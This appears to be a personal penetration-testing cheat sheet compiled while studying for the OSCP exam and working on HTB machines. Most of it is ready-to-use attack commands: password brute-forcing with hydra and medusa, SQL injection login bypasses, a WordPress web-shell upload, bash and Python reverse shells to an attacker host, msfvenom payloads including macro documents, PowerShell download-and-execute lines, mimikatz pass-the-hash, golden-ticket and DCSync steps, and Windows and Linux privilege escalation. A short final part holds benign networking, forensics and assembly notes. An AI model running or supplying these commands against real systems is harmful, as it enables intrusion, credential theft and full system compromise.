The tools techniques and procedures described on this page should only be used for approved penetration testing, CTF's and other legal hacking challenge websites. Any actions or activities related to the material contained within this site are solely the users responsibility and not that of the website owner. The author of this website will not be held responsible in the event any criminal charges be brought against any individuals misusing the information contained within to break the law.
This website was originally created as a place to store notes related to penetration testing while working on HTB challenges and studying for the Offensive Security Certified Professional (OSCP) exam. I am now making this content publicly available as my thank you to the offsec community in the hopes it will be of some help to others on their infosec journey. A point to note is that I do not claim any ownership to the content below, instead this is more of a curated list of useful commands, tools and resources I have used.
Finally this is a work in progress site, comments on changes/additions are welcome.
- Default scripts, enumerate version, o/p all formats.
nmap -sC -sV -oA nmap <IP>
- Scan top UDP ports, SNMP, TFTP etc.
nmap -sU --top-ports 20
- Scan all ports
nmap -p- <IP>
- Vulnerability scanning
nmap --script vuln <IP>
nmap -v -p 139, 445 --script=smb-vuln* <IP>
- Quick check if port is open. -z connect and disconnect, -v verbose
nc -zv <IP>
nbtscan -r <IP>
nbtscan -rvh <IP>
- Usually only very old versions are directly vulnerable. Can check for weak user password combos.
hydra -l <USERNAME> -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://<IP>
hydra -l <USERNAME> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
- validate if user exits.
nc 10.x.x.x 25
VRFY root
252 2.0.0 root
VRFY obiwan
550 5.1.1 <obiwan>: Recipient address rejected
- Zone transfer.
dig axfr @<IP> <domain.name>
dnsrecon -d <domain.name>
- Mirror contents of FTP share to local machine via anonymous login.
wget -m --no-passive ftp://anonymous:anonymous@<IP>
- Change to Binary mode. Use when uploading exploits so a bit for bit transfer is performed.
binary
- Can point to NFS if seen on Linux
- Enumeration
nmap -sV -p 111 --script=rpcinfo $RHOST
nmap -p 111 --script nfs* 10.x.x.x
If file found use mount command: mount -o nolock <IP>:/<fileshare> /path/to/local/folder/to/mount/to
groupadd --gid 5555 groupname
useradd --uid 5555 -g groupname username
- Brute force a web directory to find all valid pages
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o <output_file>
use -k flag for HTTPS
use -x flag to search for file extensions e.g. .txt, .php, .html.
use -a to set user agent string. This is usefull for when a site has protection in place to prevent direcotry bruteforcing from tools not using a user agent i.e. not browser based.
-a 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0'
- Brute force a web directory and append a forward slash + output page size
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f -l
- Loop to brute force multiple web directories. Example
for i in admin dev test backup loop; do gobuster dir -u <URL>/${i} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob; done
nikto -h <IP> -o nikto-out.txt
- Can identify Heartbleed and other certificate based vulnerabilities.
sslscan <IP>
- If on a php website and some of the file extensions are not .php the php code will not execute. Try to change it to .php and see will the content be displayed correctly.
davtest -url http://<URL>
- Copy exploit script/data to current directory
searchsploit -m <exploit number>
- list/Browse shares
smbclient -L <IP>
smbmap -H <IP>
smbclient //IP/Path -U <username_if_you_have_one>
- Mount a large file found on SMB share (VHD etc.)
mount -t cifs -o 'rw,username=guest' //IP/Backups mnt
guestmount --add /mnt/remote/path/to/vhdfile.vhd --inspector --ro /mnt/vhd -v
- Detect targets vulnerable to relay using CrackMapExec. Gives a list of hosts with SMB signing disabled.
crackmapexec smb <CIDR> --gen-relay-list targets.txt
- Verify the port is indeed open by running a script scan on it.
nmap -sU -sV -sC --open -p <Port> <IP>
- Extract info
snmp-check <IP>
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP>
snmpwalk -v1 -c public <IP>
- Location
/etc/hosts
nslookup
server <victim machine IP running DNS>
lookup the IP to see what it resolves to by entering the victim IP, may get additional domain names.
<IP>
- WordPress enumeration
wpscan --url <IP> -e vt,tt,u,ap --log wpscan.log
Log into /wp-admin
locate plugin-shell.php from /Seclists
zip the plugin: sudo zip plugin-shell.zip plugin-shell.php
upload via plugins > add-new Install Now
use curl to issue commands
curl http://<website>/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami
- Crawl a site and create a wordlist
cewl <URL> -w Results.txt
- Seclists location
/usr/share/seclists
- Rockyou location
/usr/share/wordlist/rockyou.txt
ldapsearch -x -b "dc=<domainname>,dc=domain" "*" -h <ip>
ldapsearch -x -b "dc=SOME-DOMAIN,dc=LOCAL" "*" -h 10.10.10.X
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<FQDN>'" <IP>
-
Checking for directory traversal: file extentions are a typical indicator "content.php?file=product1.php"
-
On a windows host try to include the hosts file.
http://<IP>/menu.php?file=/../../../../../../windows/system32/drivers/etc/hosts
- Check all .db, .xml dtc. files found from gobuster/dirbuster searches for strings that could be usernames/passwords
- Try multiple variations on whats found, pass19, pass20, f.lastname, f_lastname, first_l etc.
- Lookup and try default usernames and passwords.
- Get victim machine to authenticate back to attacking machine via sqli(xp_dirtree) or other means and use Responder to capture the hash.
responder -I <IP>
- scrape a webpage and create a wordlist containing words of min length 6 characters
cewl www.website.com -m 6 -w output-file.txt
- Use john to mutate a wordlist to create more entries. (Must add the custom rule to /etc/john/john.conf first)
john --wordlist=<worlist-name> --rules --stdout > mutated-wordlist.txt
- Use Crunch to create a wordlist.
- min length = 4, max length = 6, -t = rule pattern, -f file.
- Pre-defined charactersets: /usr/share/crunch/charset.list
crunch 4 6 0123456789ABCDEF -o output.txt
crunch 4 6 -f /usr/share/crunch/charset.list mixalpha -o output.txt
- Bruteforce htaccess page
medusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
- For RDP Bruteforce attacks.
crowbar -b rdp -s <IP>/32 -u admin -C /usr/share/wordlists/rockyou.txt -n 1
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
- view page source to get correct syntax for user/pass etc.
hydra <IP> http-post-form "/form/loginpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
sqlmap -r <login post message captured in Burp>
In username field: admin'-- -
- Bypass login
User: Admin
Password: OR '1'='1
- login Bypass combinations
' or 1=1 -- -
'or 1 or'
-
Union brute force http://example.com/item.php?id=1
-
Try different itterations until the correct number is discovered
?id=1 union select 1
?id=1 union select 1,2
?id=1 union select 1,2,3
?id=1 union select 1,2,3,4
- Experiment with different db commands in different column fields
?id=1 union select 1,database(),3,4
?id=1 union select 1,version(),3,4
?id=1 union select 1,password,3,4 from users
john --wordlist=/usr/share/wordlists/rockyou.txt <file.hash>
john --wordlist=/usr/share/wordlists/rockyou.txt asreproast_hashes.txt
note: We need to insert 23 after the $krb5asrep$ like $krb5asrep$23svc-mssql@domain: if not always there
./ssh2john <id_rsa> >> <outputfile.txt>
- BruteForce a login page when only the username is known. ^USER^ and ^PASS^ are variables in HYDRA. Capture the post request string using BURP
hydra -l <USERNAME> -P rockyou-50.txt <IP> http-post-form "<Path_To_Login_page>:username=^USER^&password=^PASS^:<Whatever the error msg is for wrong creds>"
- Use Cewl to generate a custom wordlist before using the larger rockyou.txt
hydra -l root@localhost -P cewl-list.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-60&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly."
- BruteForce a login page that only requires a password. "/" indicates the login page is at the root and not any sub-directory
- Since no username is required I just gave it "admin".
hydra -l admin -P rockyou.txt <IP or URL or docker> http-post-form "/:password=^PASS^:Invalid password!" -s <Port>
- Fuzz login credentials with part of the password known. -d flag specifies postdata.
wfuzz -u http://<IP>/login/index.php -d 'anchor=&username=user&password=passwordFUZZ' -w /usr/share/seclists/Fuzzing/special-chars.txt
- Fuzz from-encoded data containing a username and password.
wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php
- Decode a base64 file from terminal
base64 -d <file_name.txt>
- Decode a base16 file and output it to a new file
cat index.php | xxd -r -p > filename.txt
- NTLM hashes are stored in the Security Account Manager (SAM) database and in Domain Controller's NTDS.dit database.
- The first part is the LM part of the hash and the second part is the NT hash. From Vista\Server 2008 only NT hash stored.
- Can be obtained by mimikatz or dumping SAM/NTDS.dat database.
- CAN PERFORM PASS THE HASH
aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
- Net-NTLM are used for network authentication. They use a challange/resonse method and are based on the users NT hash.
- Can be obtained by responder and similar tools.
- CANNOT PERFORM PASS THE HASH
- CAN USE A RELAY ATTACK ON TARGETS WITH SMB SIGNIN DISABLED e.g. ntlmrelayx.py
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
reg save hklm\sam c:\sam
reg save hklm\system c:\system
samdump2 system sam
- Useful if you have obtained a list of potential domain users.
python GetNPUsers.py <FQDN>/ -usersfile top-usernames-shortlist.txt -format hashcat -outputfile hashes.asreproast
python GetNPUsers.py domain.name/ -usersfile ListOfUsers.txt -format john -outputfile <Outfile> -dc-ip <IP>
python secretsdump.py <FQDN>/<USER>r@<IP>
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@<IP>
https://www.hackingarticles.in/docker-privilege-escalation/
docker run -v /etc:/mnt -it alpine
gcc -march=x86-64 <exploit.c> -o <compiled-exploit-name>
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
- If you have write access to /etc/passwd a new user with root privlieges can be added.
- To create a new user openssl can be used to hash the password and add a salt.
openssl passwd -1 -salt <username> <password>
sample output: $1$obiwan$eOmyK1CrqORI.Kp/0.64H0
- Edit the /etc/password file to incude the following:
<username>:$1$obiwan$eOmyK1CrqORI.Kp/0.64H0:0:0:root:/root:/bin/bash
openssl passwd Passw0rd1
echo "NewRootUser:<Output of openssl above>:0:0:root:/root:/bin/bash" >> /etc/passwd
adduser <username>
usermod -aG sudo <username>
scp -i </path/to/id_rsa> <FiletoCopy.txt> user@x.x.x.x:/path/to/copy/file/to/filename.txt
- .ssh/authorized_keys (Server) – contains the public keys of any authorised clients who can connect.
- .ssh/id_rsa – (Client) - Contains the private key for the client who wishes to connect to the server.
- .ssh/id_rsa.pub (Client) – Contains the public key for the client.
ssh -i mykey user@<IP>
# list allowed commands for invoking user
sudo -l
# run commands as another user
sudo -u <username>
# run a bash shell as another user
sudo -u <username> bash
run systeminfo on victim machine and save to systeminfo.txt
python windows-exploit-suggester.py -d <latest secuity bulliten .xls> -i <systeminfo.txt>
windows-privesc-check2.exe --dump -G
#load modules
. .\SharpHound.ps1
Invoke-BloodHound -Domain <FQDN> -LDAPUser <USER> -LDAPPass <PASS> -CollectionMethod All -DomainController <HOSTNAME> -ZipFileName Hound3.zip
neo4j consoe
bloodhound
# Creating PSCredential object for use with Powerview
$pass = convertto-securestring 'Password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\anakin', $pass)
# DcSync using Powerview.ps1 - Note commands given in bloodhound may not be correct if not working lookup gitbook.io
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Dc=htb,Dc=local" -PrincipalIdentity anakin -Rights DCSync
powershell -ep bypass
. .\PowerUp.ps1
- Copy PowerView.ps1 onto target box for enumeration of AD environment
get-netdomain
get-netdomaincontroller
get-netuser | select cn, logoncount
get-netgroup
get-netgroup -GroupName <name> e.g: *admin*
get-netgroupmember -Groupname <"name">
Invoke-ShareFinder
get-netgpo
get-netgpo | select displayname, whenchanged
sekurlsa::tickets /export
Run from /usr/share/kerberoast (so the correct modules can be loaded by the .py script)
python tgsrepcrack.py <wordlist> <SPN.kirbi>
python kirbi2john.py dumpedTicket.kirbi > john-kirbi.txt
john john-kirbi.txt --wordlist=wordlist.txt
ruby evil-winrm.rb -i <IP> -u <user> -p '<password>'
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
eg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
- If you have SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege privileges the RottenPotatoNG local priv esc exploit can be used to get NT Authority\System.
In a meterpreter session run getprivs, e.g.
getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
In a windows cmd session
whoami /priv
https://ohpe.it/juicy-potato/CLSID/
# On target system, after copying required binaries
echo C:\temp\nc.exe -e cmd.exe <Ayyacking IP> <Attacking Port> > rev.bat
.\JuicyPotato.exe -l 1337 -p C:\temp\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
- Method (D***o Writeup)
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
Meterpreter
use incognito
list_tokens -u
https://foxglovesecurity.com/2016/01/16/hot-potato/
net user obiwan Passw0rd1 /add
net localgroup administrators obiwan /add
# adduser.c contents
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user obiwan Passw0rd1 /add");
i = system ("net localgroup administrators obiwan /add");
return 0;
}
# compile into .exe
i686-w64-mingw32-gcc adduser.c -o adduser.exe
net accounts
mimikatz # sekurlsa::pth /user:<username> /domain:<domain.com> /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:PowerShell.exe
List Kerberos cached tickets (Powershell) Note- may need to request a ticket first by using net use etc.
(net use \\dc01)
klist
psexec.exe \\dc01 cmd.exe
mimikatz # lsadump::lsa /patch
or from kiwi through meterpreter
creds_msf
whoami /user
or
whoami /all
kerberos::golden /user:obiwan /domain:domain.com /sid:S-1-5-21-4038953314-3014849035-1274281563 /krbtgt:fc274a94b36874d2560a7bd332604fab /ptt
misc::cmd
lsadump::dcsync /user:Administrator
use exploit/windows/local/bypassuac_injection_winsxs
List all files including hidden
dir /ah
wmic logicaldisk get name
net use
net use z: \\remotepc\sharename
net use z: /delete
net use \\remotepc\C$ /u:username password
psexec.py <User>:@<IP> -hashes aad3b435b51404eeaad3b435b51404ee:<second part of NTLM hash>
cp /usr/share/exploitdb/exploits/multiple/remote/<EXPLOIT.rb> /root/.msf4/modules/
use exploit/multi/handler
set LHOST <attacker IP>
set LPORT <attacker Port>
set payload windows/meterpreter/reverse_tcp
exploit
- Meterpreter reverse shell in exe format for use on windows machine (.exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attackers_IP> LPORT=<Attackers_Port> -f <file-type e.g. exe> > <name.exe>
- Meterpreter reverse shell in vba format for use in file with macros e.g. .doc
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba -o <NAME.doc>
- msfvenom payload used on an smb exploit for windows xp box
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
- Adobe Coldfusion Java/Jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.jsp
- Tomcat war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f war > shell.war
use post/multi/recon/local_exploit_suggester
set session <session number>
run
use exploit/windows/local/<exploit name>
show options
set session <session number>
set lhost=<attacking IP> (may have to enter twice due to bug)
sessions -i <session number>
hashdump
getsystem
sysinfo
ps
migrate <pid> - mayhave to migrate to a sysyem owned process for stability or to run things like hashdump
getuid
getprivs
run post/windows/gather/smart_hashdump
run post/windows/gather/credentials/sso
load kiwi - load mimikatz modules
creds_all - within mimikatz
set AutoRunScript post/windows/manage/migrate
crackmapexec smb <CIDR IP RANGE> -u <USER> -H '<HASH>'
- First part of hash: aad3b435b51404eeaad3b435b51404ee
pth-winexe -U <USER>%<FULL:HASH> //<IP> cmd
- copy Sherlock.ps1 from victim to attacker machine (served via simpleHTTPserver.py)
(New-Object System.Net.WebClient).DownloadFile("http://<IP>:80/Sherlock.ps1", "C:\Users\user\downloads\Sherlock.ps1")
- Fileless method
powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://<IP>:80/SharpHound.ps1'))"
- Download file from attacking machine and run on victim machine.
powershell "IEX(New-Object Net.WebClient).DownloadString('http://IP:80/<File>')"
- Another method to download and execute, gets around PS hanging issue
echo IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/PowerUp.ps1') | powershell -noprofile -
- Certutil method (served via simpleHTTPserver.py) Note can remove "" also
certutil -urlcache -split -f "http://<IP>:<PORT>/<FILE>" c:\PATH\TO\<FILE>
- nc.exe file transfer
Vicitim machine: nc.exe -nlvp 4444 > c:\path\to\file\file.exe
Attacking machine: nc -w 3 <Victim IP> 4444 < file.exe
tr -d ' ' < random.txt > random_nospace.txt
Simple HTTP server to host files on attacking machine
python -m SimpleHTTPServer 80
impacket-smb <share-name> <path to file share on attacking machine (can run in specific dir and use ".")>
impacket-smb gimme .
impacket-smbserver secure . --smb2support
Execute on target machine. Bash -c indicates bash command in case you are in another non bash shell
bash -c 'bash -i >& /dev/tcp/ATTACKING IP/PORT 0>&1'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Note - Remeber if copying into an existing .py script on target machine, dont include "python -c ' ' ". Only need to invoke python -c ' ' from a bash shell.
- Make the shell interactive, tab completion etc.
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg <ENTER> <ENTER>
- Allow clearing of the terminal using clear
export TERM=xterm
echo 'exec("/bin/bash");' >> shell.pl
sudo perl shell.pl
- Sometimes a reverse shell may not work even when uploaded sucessfully and called. In this case a webshell may work which can be used to then upload a full reverse shell payload and call it via the webshell.
- Tomcat is a type of web server used to serve web applications developed in Java built to the java Servlet specification.
- Apache is an open source free web server software.
-
ERROR CODES
-
1xx: Info
-
2xx: Sucess
-
3xx: Redirect
-
4xx: Client side
-
5xx: Server side
-
METHODS
-
Get: Read only method used to retrieve information from a server using a URI.
-
Post: General purpose send data to a server e.g. an image to be uploaded.
-
Put: Replaces the current target resource with the new uploaded content.
-
Delete: Remove some information contained on the server.
-
HEADERS: Extra Meta information sent by the client to ensure requests are processed correctly.
-
Language
-
Character set
-
Content type
-
Cookies
-
BODY: (Optional) Core data sent to server to process the request.
-
Data in which the client is sending to the server.
-
Resolves domain names into IP addresses
-
Steps
- Recursive name server (ISP/Public e.g google)
- Root Servers: 13 placed strategically around the world. Manages requests for tld's e.g. .com, .org etc.
- TLD Server: e.g .com
- Authorative Name Server: Contains IP's for the particular domain e.g. .com
-
Clear DNS cache on windows
ipconfig/flushdns
- ssh syntax
ssh username@IPAddress
- Determine Partition Information
mmls image_name.dd
- File system statistics. Indicates type of file system and information about it
fsstat -o offset image_name.dd
- List all the files recursively
fls -r -o offset image_name.dd
- get file metadat e.g. MAC times etc.
istat -o offset image_name.dd identifying number
- recover contents of a file and o/p to a file named recovered.jpg
icat -o offset image_name.dd identifying number > recovered.jpg
- extract hidden data from an image (Password known)
steghide extract -sf image.jpg -p <password>
- crack a password protected zip folder.
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' bank-account.zip
- Use 7zip to list contents of zip file and show technical info e.g. encryption used.
7z l -slt Access\ target.zip
- convert zip file to john the ripper format
zip2john target.zip
- 1: Static Analysis
- 2: Blackboxing
- 3: Internet Search
- 4: Whiteboxing
- 5: Results
-
Source Code: Human readable e.g. C code
-
Object Files: Binary code with readable symbols
-
Executable: Binary code without readable symbols
-
Decompiling: usually very difficult so dissasembly is used instead
-
Dissasembly: transforms the binary executable into readable assembly code
- load effective address. used to save an adress and add values in one instruction.
LEA EAX, [EBX+1]
- Setting a value to zero with XOR is more efficient than using MOV
XOR EAX, EAX
- mul multiples al, ax or eax by . Results stored in ax, dx:ax or edx:eax
MUL <src>
- Test performs a Binary AND function on the src and dest. It only changes status Flags.
TEST EAX,EBX
- CMP performs a SUB on both operands and sets the appropriate Flags.
CMP EBX, EAX
-
Scan string compares values in EDI to AL,AX or EAX. Sets appropriate flags (ZF). Inc/Dec EDI 1 if DF=0/1.
-
Rep instruction repeats using ECX as a counter. After each rep ECX is decremented.
repne scasb
- Detection
- Response
- Mitigation
- Reporting
- Recovery
- Remediation
- Lessons learned
-
4688/592: New process executed, look for obvious .exe's (csript.exe, sysprep.exe, psexec.exe, oddname.exe)
-
4624/528/540: Account Logged in
-
5140/560: Share was accessed, most likely C$
-
5156: Windows Firewall Network connection by process. Can see the process connect to an external IP
-
7045/601: New Service installed. Normal systems only get new services installed at patch time.
-
4663/567: New File/Reg creation. File auditing must be enabled.
https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=7
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/sh
-Tunnel a service running on port 10000 on the victim machine to our localhost on the same port
-specify the compromised users name and password
ssh -L 10000:localhost:10000 username@<remote IP>
wmic qfe
wmic logicaldisk get caption,description,providername
powershell -ep bypass
nano /etc/samba/smb.conf
min protocol = SMB2 (add this line)
client min protocol = LANMAN1 (or add this line)
/etc/init.d/smbd restart
powershell -command "start-process priv1.exe -Credential (New-Object System.Management.Automation.PSCredential 'username',(ConvertTo-SecureString 'password' -AsPlainText -Force))"
<script>alert('site is vulnerable to xss!')</script>
- Include 10 lines above and below search term using grep
grep -c 10
- Tmux
tmux -S /.devs/dev_sess
- Check privileges of current shell
id
- Find a particular file
locate <filename>
- Vi commands
Insert a line at end of file: "Esc" "G then o"
write changes and exit "Esc" ":Wq"
- Cat equiv in windows
more
- List all files in windows
dir /aihd
- list files in current directory
Get-ChildItem
gci
ls
- View services
Get-Service
- Object which is populated with the current item thats in the pipline.
$_
- Example of using $_
Get-Service | Where-Object {$_.DisplayName -match "MS"}
- Current running processes
Get-Process
- Runas
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred “C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"
- Autoruns
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
- AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- registry
#Enumerate
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
#Add the exe to the service
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
- Executable files
#Identifying via access check
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
#exploiting copy the malicous exe to the location of vulnerbale service
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
net localgroup administrators
- Startup Applications
#Identify id the user has permissions.
“BUILTIN\Users” group has full access ‘(F)’ to the directory
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#generate a malicous exe using msfvenom
copy it to:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs|startup
#when a user logs in/restart we get reverse shell
Dll Hijacking
# Scenario assumes we have discovered a DLL hijack vulnerability
# edit our dll file to add the user “user” to admin group
windows_dll.c
# compile
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
# serve up to target and save in temp folder
# restart the service
sc start dllsvc
- Service Permission Paths
# running accesscheck
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc Everyone *
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
# Exploit
sc qc daclsvc
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
# may get error as we have removed the original exe but exploit worked
- Unquoted Serice Paths
# identify vul by using powerup
sc qc unquotedsvc
#Exploit
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
- Drupal Exploit
https://github.com/dreadlocked/Drupalgeddon2
https://github.com/pimps/CVE-2018-7600
- MS10-59
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
#usage: MS10-059.exe 10.10.14.38 5555
- Check for intended path on CTF's
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
- spawn a sudo tty when we have sudo permissions on a file for escalation
python -c 'import pty; pty.spawn("/bin/sh")'
$ sudo /home/anansi/bin/anansi_util manual ifconfig
sudo /home/anansi/bin/anansi_util manual ifconfig
No manual entry for manual
WARNING: terminal is not fully functional
- (press RETURN)
!/bin/sh
# whoami
whoami
root